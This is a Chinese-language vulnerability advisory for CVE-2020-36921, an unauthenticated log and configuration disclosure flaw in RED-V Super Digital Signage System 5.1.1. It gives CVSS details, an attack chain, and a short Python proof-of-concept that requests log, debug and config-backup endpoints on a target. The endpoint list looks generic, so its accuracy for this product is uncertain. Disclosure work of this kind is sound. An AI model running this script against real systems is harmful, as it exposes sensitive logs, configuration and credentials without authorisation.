IPBUF安全漏洞报告
English
CVE-2020-36921 CVSS 7.5 高危

CVE-2020-36921 RED-V Super Digital Signage System 信息泄露漏洞

披露日期: 2026-01-06

漏洞信息

漏洞编号
CVE-2020-36921
漏洞类型
信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
RED-V Super Digital Signage System 5.1.1

相关标签

信息泄露RED-V数字标牌系统未授权访问

漏洞概述

RED-V Super Digital Signage System 5.1.1存在一个严重的信息泄露漏洞。该漏洞允许未经身份验证的攻击者访问敏感的web服务器日志文件。由于系统缺乏适当的访问控制机制,攻击者可以通过访问特定的URL端点来获取系统资源、调试日志信息以及其他敏感数据。这些信息可能被用于进一步的攻击活动,如收集系统架构、识别其他潜在漏洞或获取凭据等。该漏洞的CVSS评分为7.5,属于高危级别,对系统的机密性造成严重影响。

技术细节

该漏洞源于RED-V Super Digital Signage System在访问控制方面的缺陷。系统中的多个端点缺乏身份验证机制,允许未认证用户直接访问日志文件和系统资源。攻击者可以通过构造特定的HTTP请求来访问这些端点,获取包括调试信息、系统配置、用户活动记录等敏感数据。由于这些端点直接返回服务器上的文件内容,攻击者无需任何权限即可获取敏感信息。

攻击链分析

STEP 1
步骤1
攻击者识别目标系统并发现可访问的端点
STEP 2
步骤2
通过缺乏认证的端点提取敏感日志和系统信息
STEP 3
步骤3
利用获取的信息进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2020-36921 PoC # RED-V Super Digital Signage System Information Disclosure target = input("Enter target URL: ") endpoints = [ "/logs/access.log", "/logs/error.log", "/debug/logs", "/system/info", "/config/backup" ] for endpoint in endpoints: url = f"{target}{endpoint}" try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] Found: {url}") print(response.text[:500]) except requests.exceptions.RequestException: pass

影响范围

RED-V Super Digital Signage System < 5.1.2

防御指南

临时缓解措施
立即应用RED-V发布的最新安全更新,修补信息泄露漏洞。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表